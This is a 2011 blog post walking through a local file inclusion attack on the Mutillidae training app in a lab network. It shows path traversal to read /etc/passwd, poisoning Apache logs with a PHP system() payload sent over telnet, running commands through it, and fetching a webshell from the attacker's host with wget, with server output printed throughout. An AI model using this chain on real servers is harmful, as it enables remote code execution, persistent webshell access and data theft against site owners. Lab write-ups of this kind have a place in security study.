Senin, 08 Agustus 2011

Local File Inclusion

Today I will share you how to upload shell to web server with local file inclusion (LFI)..
first I was tried one web that vulner of  LFI attack then I tried to inject the variable page like this
http://192.168.56.101/mutillidae/index.php?page=.../ and it got an error like this bellow

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /opt/lampp/htdocs/mutillidae/index.php on line 352
Warning: include() [function.include]: Failed opening '../' for inclusion (include_path='.:/opt/lampp/lib/php') in /opt/lampp/htdocs/mutillidae/index.php on line 352

its mean that this web can be exploit .. next job I have to find out location of directory etc/passwd/
the result like this :

oot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh dhcp:x:100:101::/nonexistent:/bin/false syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false messagebus:x:103:107::/var/run/dbus:/bin/false avahi:x:104:108:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false cupsys:x:105:109::/home/cupsys:/bin/false haldaemon:x:106:110:Hardware abstraction layer,,,:/var/run/hal:/bin/false hplip:x:107:7:HPLIP system user,,,:/var/run/hplip:/bin/false soikrucil:x:1000:1000:SOy,,,:/home/soikrucil:/bin/bash

the next I have to find out the directory of file error_log and access_log the i tried testing like this


and the results like this :

192.168.56.1 - - [09/Aug/2011:21:38:21 +0700] "GET /mutillidae/styles/global-styles.css HTTP/1.1" 304 - 192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/styles/ddsmoothmenu/ddsmoothmenu.css HTTP/1.1" 304 - 192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/javascript/ddsmoothmenu/jquery.min.js HTTP/1.1" 304 - 192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/styles/ddsmoothmenu/ddsmoothmenu-v.css HTTP/1.1" 304 - 192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/javascript/ddsmoothmenu/ddsmoothmenu.js 

then I tried to testing for error_log


and the results like this :

[Tue Aug 09 21:39:25 2011] [error] [client 192.168.56.1] Invalid method in request \xff\xf4\xff\xfd\x06

those all the content of error_log access_log file 

now I try to inject the file using bad request error that contain the simple script 

I open the console then i try to telnet the target using port 80 and the result like this :


root@bt:~# telnet 192.168.56.101 80
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
GET /<? system ($_REQUEST['cmd']); ?> HTTP/0.1             
HTTP/1.1 400 Bad Request
Date: Tue, 09 Aug 2011 13:45:19 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Length: 399
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80</address>
</body></html>
Connection closed by foreign host. 

this request will be write down on error_log and access log file, its mean that I can access my script from the file using local file inclusion before.

if log successfully write on it, and i tried to access the directory of access_log again


and I got error like this :

Warning: system() [function.system]: Cannot execute a blank command in /opt/lampp/logs/access_log on line 32
HTTP/0.1 " 400 399

Its mean that the script successfully write..now try to execute command like id..
like this :

and the results of the command :
09/Aug/2011:21:46:20 +0700] "GET /uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) HTTP/0.1 " 400 399 192.168.56.1 - - 

this time to upload my webshell wahahaha 


and I am not really believe my webshell successfully uploaded..so I go to check the error_log and the results said successfully saved. the result like this :

92.168.56.1] request failed: error reading the headers wget: /opt/lampp/lib/libcrypto.so.0.9.8: no version information available (required by wget) wget: /opt/lampp/lib/libssl.so.0.9.8: no version information available (required by wget) --21:58:12-- http://192.168.56.1/shEll.txt => `/opt/lampp/htdocs/soi.php' Connecting to 192.168.56.1:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2.800 (2.7K) [text/plain] 0K .. 100% 148.35 MB/s 21:58:12 (148.35 MB/s) - `/opt/lampp/htdocs/soi.php' saved [2800/2800] wget: /opt/lampp/lib/libcrypto.so.0.9.8: no version information available (required by wget) wget: /opt/lampp/lib/libssl.so.0.9.8: no version information available (required by wget) --21:58:17-- http://192.168.56.1/shEll.txt => `/opt/lampp/htdocs/soi.php' Connecting to 192.168.56.1:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2.800 (2.7K) [text/plain] 0K .. 100% 140.54 MB/s 21:58:17 (140.54 MB/s) - `/opt/lampp/htdocs/soi.php' saved [2800/2800]
  
and I can access my webshell using url :

thanks ....by 5oy..

Tidak ada komentar:

Poskan Komentar